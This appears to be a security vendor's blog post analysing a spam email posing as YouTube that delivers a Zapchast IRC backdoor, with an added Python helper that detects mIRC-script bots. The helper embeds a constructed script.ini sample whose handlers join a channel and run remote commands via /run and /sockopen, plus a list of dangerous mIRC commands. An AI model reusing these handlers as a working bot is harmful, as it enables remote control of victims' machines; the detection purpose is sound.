YouTube Toolbars

Yesterday I uploaded my first ever HD movie to YouTube. Once this was finished, I immediately got an email from YouTube saying “Congratulations on your first YouTube upload!” along with further hints and tips on getting the best out of it. Only a couple of hours later, I got another email, this time, saying “Hello, Have you tryed YouTube Toolbar?”

The typo in the subject line should be a good indication to anyone that this was most likely not from YouTube. Indeed, the message – which was rather poorly formatted – contained a link to a Backdoor.IRC.Zapchast variant.

Backdoor.IRC.Zapchast.i spam email

The executable that the link in the email points to is a RAR SFX archive containing a number of files, shown in the screenshot below.

Almost all Zapchast variants look like this, with very minor differences. What about the origin of this backdoor? There are a number of clues in the files which seem to indicate that they come from Romanian malware authors, ranging from Romanian-specific passwords to links to Romanian-specific websites.

These backdoors work through mIRC scripts: they carry a copy of the mIRC executable (version 6.01, packed with UPX), and the backdoor code itself is written as a mIRC script. The screenshot above shows the 'csrss.exe' file. Once activated, they connect to the Undernet network and join a particular channel to receive commands, as well as notifying the owner of the botnet about a newly infected user. The handling of the commands is implemented in the 'script.ini' file.
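To make the structure of such a script-based backdoor concrete, here is an added triage helper (my own example, not Kaspersky's code and not the actual Zapchast script). It parses a constructed mIRC-style script.ini, lists the event handlers, the server and channel the script joins, and any commands in the handlers that can run or fetch arbitrary content (mIRC's /run, /dll, /sockopen, /write and similar), and flags the file when a server, a channel and such a command all appear together. A second helper applies the crude UPX check analysts use when triaging the bundled mIRC binary: the packer leaves section names UPX0/UPX1 in the PE. The server, channel and command strings in the sample are invented for this example.

```python
"""Heuristic triage of a mIRC script.ini for IRC-backdoor behaviour.

Added example: the sample script below is constructed for illustration and is
not the script shipped with any real Zapchast variant.
"""
import re
from dataclasses import dataclass, field

# Constructed script.ini in mIRC's storage format: a [script] section whose
# lines are numbered n0=, n1=, ... and hold 'on <level>:<EVENT>:...' handlers.
SAMPLE_SCRIPT_INI = """[script]
n0=on *:START:{ /server irc.undernet.example 6667 }
n1=on *:CONNECT:{ /join #example-channel }
n2=on *:JOIN:#example-channel:{ /msg $chan new bot $me online }
n3=on *:TEXT:!run *:#example-channel:{ /run $2- }
n4=on *:TEXT:!get *:#example-channel:{ /sockopen dl $2 80 }
"""

SCRIPT_LINE = re.compile(r"^n\d+=(.*)$")
EVENT_HANDLER = re.compile(r"^on\s+\S+?:([A-Za-z]+):")
SLASH_CMD = re.compile(r"/([A-Za-z]+)")
SERVER_CMD = re.compile(r"/server\s+(\S+)", re.IGNORECASE)
JOIN_CMD = re.compile(r"/join\s+(#\S+)", re.IGNORECASE)

# mIRC commands that let a remote operator execute, fetch or alter files.
DANGEROUS_CMDS = {"run", "dll", "sockopen", "write", "remove", "bcopy",
                  "copy", "rename", "timer"}


@dataclass
class ScriptFindings:
    events: list = field(default_factory=list)    # handler events, in order
    servers: list = field(default_factory=list)   # hosts passed to /server
    channels: list = field(default_factory=list)  # channels passed to /join
    dangerous: list = field(default_factory=list) # risky commands, deduped

    def is_suspicious(self) -> bool:
        """A script that connects, joins a channel and can run/fetch things
        on command is the bot-like pattern worth escalating."""
        return bool(self.servers) and bool(self.channels) and bool(self.dangerous)


def parse_script_ini(text: str) -> ScriptFindings:
    """Walk the [script] section and collect behavioural indicators."""
    findings = ScriptFindings()
    in_script = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        if not in_script:
            continue
        m = SCRIPT_LINE.match(line)
        if not m:
            continue
        body = m.group(1)
        ev = EVENT_HANDLER.match(body)
        if ev:
            findings.events.append(ev.group(1).upper())
        findings.servers.extend(SERVER_CMD.findall(body))
        findings.channels.extend(JOIN_CMD.findall(body))
        for cmd in SLASH_CMD.findall(body):
            cmd = cmd.lower()
            if cmd in DANGEROUS_CMDS and cmd not in findings.dangerous:
                findings.dangerous.append(cmd)
    return findings


def looks_upx_packed(pe_bytes: bytes) -> bool:
    """Cheap indicator only: UPX leaves UPX0/UPX1 section names in the PE.
    A packer can rename them, so treat a miss as inconclusive."""
    return pe_bytes.startswith(b"MZ") and (b"UPX0" in pe_bytes or b"UPX1" in pe_bytes)


if __name__ == "__main__":
    result = parse_script_ini(SAMPLE_SCRIPT_INI)
    print(result)
    print("suspicious:", result.is_suspicious())
    # Constructed stand-in for a packed PE header, not a real binary.
    print("upx:", looks_upx_packed(b"MZ" + b"\x00" * 62 + b"PE\x00\x00UPX0"))
```

The three-way condition in `is_suspicious` is deliberate: a legitimate mIRC script may well connect and join channels, and an offline utility script may use /write, but the combination of a hard-coded server, a hard-coded channel and a remote-triggered /run or /sockopen is the shape of the command loop described above, so that is what gets escalated for manual review.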

Aside from handling the mIRC commands it receives from its master, there is no further code designed to steal confidential data or financial information from the victim's computer. This is rather uncommon nowadays: families such as Zapchast are slowly dying out, making way for more advanced Trojans like Zbot or Sinowal.
